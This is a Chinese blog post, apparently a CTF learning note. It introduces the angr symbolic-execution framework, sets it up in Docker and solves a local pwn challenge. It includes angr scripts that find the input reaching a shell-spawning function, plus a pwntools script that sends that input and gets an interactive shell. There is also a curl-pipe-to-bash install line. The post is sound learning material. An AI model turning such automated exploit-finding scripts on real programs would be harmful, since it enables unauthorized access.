其实是看了 D0g3 实验室的 i0gan 师傅介绍了下 auto pwn 的二进制挖掘的例子,很想看看到底什么事物
1.angr python 框架#
What is angr?
angr is a python framework for analyzing binaries. It combines both static and dynamic symbolic ("concolic") analysis, making it applicable to a variety of tasks.
It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team, Shellphish, the open source community, and @rhelmot.
concolic是单词 concrete (具体)和 symbolic (符号)的一个混合体。 concolic testing是一个同时使用了符号执行(将程序变量当做符号化的变量)和具体执行(concrete execution,涉及到具体的输入)的混合式的软件验证技术。
2.angr 环境部署#
install docker
curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun
docker pull
docker pull angr/angr
./setup.sh -i -e angr
# hwo to use angr in docker
docker run -itd --name angr angr/angr
docker exec -it angr bash
su angr # root用户没有angr的环境,需切换到angr用户
#! /bin/sh
# Author: i0gan
# for starting docker angr
pwd=`pwd`
if [[ $1 < 2 ]];then
echo "Usage angr script.py"
exit
fi
script = $1
docker run -it \
-u angr \
--rm \
-v $(pwd)/${ctf_name}:/ctf/work \
-w /ctf/work angr/angr "/home/angr/.virtualenvs/angr/bin/python" "/ctf/work/$script" $2 $3
docker run -it \
--rm \
-v $(pwd)/${ctf_name}:/ctf/work \
-p 23946:23946 \
--privileged \
--cap-add=SYS_PTRACE \
--security-opt seccomp=unconfined \
pwndocker
3.angr 初识#
4.PWN 题自动化挖掘实例#
感谢成信 D0g3 师傅很快给了对应的题目;
root@DESKTOP-4VN4G0C:/Desktop/pwn# checksec pwn1
[*] '/Desktop/pwn/pwn1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
IDA 对应的反汇编的代码,接下来分析其对应的逻辑:
int sub_804870E()
{
int result; // eax
char v1; // [esp+Ch] [ebp-1Ch]
int v2; // [esp+1Ch] [ebp-Ch]
result = atoi(&input);// '\n'则默认case 0 此外还有1,2,其他的分支
v2 = result;
switch ( result )
{
case 1:
puts("logging out...");
result = ~dword_804A06C;
dword_804A06C = ~dword_804A06C;
break;
case 2:
if ( dword_804A06C )
result = sub_80486F5(); // 反弹shell
else
result = puts("please log in");
break;
case 0:
puts("input your passwd:");
result = sub_804859B((int)&v1, 16); // 理论上是输入密码的,但是不是匹配无法知道密码是多 少
dword_804A06C = 1; // 反弹shell的关键变量
break;
}
return result;
}
D0g3 的师傅给出的方法就是使用 angr 框架来达到跳转到 shell 函数的目的,只要可以跳转到红色的即可
target_addr = 0x08048783
import angr
from binascii import b2a_hex
import logging
import sys
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')
def angr_main():
pj = angr.Project('./pwn1')
state = pj.factory.entry_state()
simgr = pj.factory.simgr(state)
simgr.explore(find = 0x08048783) # call shell
p = simgr.found[0].posix.dumps(0)
print(b2a_hex(p).decode(), end='')
angr_main()
root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/pwn1 1e40bd134aa7:/home
root@DESKTOP-4VN4G0C:/Desktop/pwn# docker cp /Desktop/pwn/script.py 1e40bd134aa7:/home
from pwn import *
import os
from binascii import a2b_hex
io = process('./pwn1')
print('Solving...')
payload = a2b_hex('310a320a')
io.send(payload)
print('Get shell')
io.sendline(b'whoami')
io.interactive()
import angr
from binascii import b2a_hex
import logging
import sys
#logging.getLogger('angr').setLevel('INFO')
logging.getLogger('angr').setLevel('CRITICAL')
def angr_main():
pj = angr.Project('./find_flag')
state = pj.factory.entry_state()
simgr = pj.factory.simgr(state)
simgr.explore(find = 0x1229) # call shell
p = simgr.found[0].posix.dumps(0)
print(b2a_hex(p).decode(), end='')
angr_main()
这篇水文属于测试 xLog 这个平台的用的,以后虽然不再打 CTF 二进制方向了,但是可能还会关注这个方向有意思的一些议题或者课题。